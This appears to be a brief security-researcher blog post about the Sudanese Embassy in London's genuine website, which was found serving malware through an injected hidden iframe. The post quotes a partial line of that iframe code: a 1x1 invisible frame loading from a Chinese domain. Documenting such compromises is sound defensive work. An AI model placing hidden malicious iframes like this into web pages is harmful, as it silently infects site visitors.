Monitoring our queues yesterday I thought that I saw a fake Sudanese Embassy website serving malware (Mal/Iframe-F). The press release heading were strange:-
- Who is Blackmailing Whom?
- ICC – Europe’s Guantanamo?
- Sudan and ICC
- National Elections Commission
Registrant's address: 60 Chambers Lane London NW10 2RL United Kingdom
NW10 stands for the postcode area North West 10 i.e. Willesden Green. Not where you would traditionally think of Embassies being based in London.
The Contact details were correct though:-
Embassy of the Republic of the Sudan 3 Cleveland Row St. James's London SW1A 1DD
Curiouser and curiouser. Looking through search engine results on the site it appears that the site is that of the Embassy of Sudan in London!
So why had the site come up in the queues?
Well it contains an iframe with the following code:
.cn/in.cgi?id1000" width=1 height=1 style="visibility: hidden">
this malicious Iframe is very small and will download further malware from a Chinese website.
Like other embassies that have been hit, India etc., the Sudanese haven’t been targeted deliberately but are victims of poor security.